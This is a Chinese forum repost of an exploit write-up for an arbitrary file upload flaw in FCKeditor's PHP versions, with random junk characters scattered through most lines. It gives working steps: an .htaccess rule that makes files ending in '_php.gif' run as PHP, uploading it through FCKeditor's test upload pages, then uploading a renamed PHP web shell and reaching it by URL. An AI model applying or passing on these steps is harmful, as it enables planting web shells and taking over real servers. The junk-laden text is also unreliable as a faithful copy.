FCKeditor所有php版本Upload上传漏洞
3 I: J7 Y2 I8 a3 _# D! x4 {4 _作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
, { w+ o, ~. H8 u7 n, x减小字体 增大字体7 P, r2 L7 t5 t. b$ |2 z
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability1 N3 o- R! d* G6 _% z7 x; d: U
[+] Date: 2011- N' d7 F5 _& K+ f+ Y
[+] Author : sinesafe.cn$ Y5 t3 H/ C0 e, C: `7 x
[+] Website : WwW.sinesafe.cn! u1 r6 C" Y4 P& x$ v$ q w
———————————————————
! w r, B+ ~ F8 n% }- X1.create a htaccess file:
" D) f: b6 h1 K1 kcode:( v. V: T, a" q9 W% Z$ ^$ h
<FilesMatch “_php.gif”>$ ?- A9 G0 |3 u4 N! K* c8 ]+ v
SetHandler application/x-httpd-php
0 C1 U9 Y" k( U, m, ~$ Q</FilesMatch>
8 M% c0 _6 a7 ]! I# g/ d
. ^5 z2 \8 V2 e0 w2.Now upload this htaccess with FCKeditor.( L) C/ D2 G4 u( v
6 U: z- u; V# l$ k# {2 ?) Lhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
! n) R1 Y6 ?( G& r3 o* B( O
" F- M+ M' @* l; @http://www.sinesafe.cn/FCKeditor ... onnectors/test.html$ D& x3 R2 t+ N% o9 `4 X
|8 w+ B9 ]- y0 ?5 ^% |
———————————————————————————————-3 l1 x5 V- I" N- `4 N ]9 g5 K% X D. S
3.Now upload shell.php.gif with FCKeditor.4 K% O" _5 F( g- U
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
1 L$ v- d2 D3 h3 r( C5.http://www.sinesafe.cn/anything/shell_php.gif
" O7 E1 I/ h7 A: j3 m$ q/ e6.Now shell is available from server. |
! w8 J, h# G1 f6 k% i7 n* ?# K4 y7 s' v, ]5 } E, W* D- K
* v+ i+ g" k! v0 P! P. e
|
发表于 2013-10-27 17:25:21
收藏
支持
反对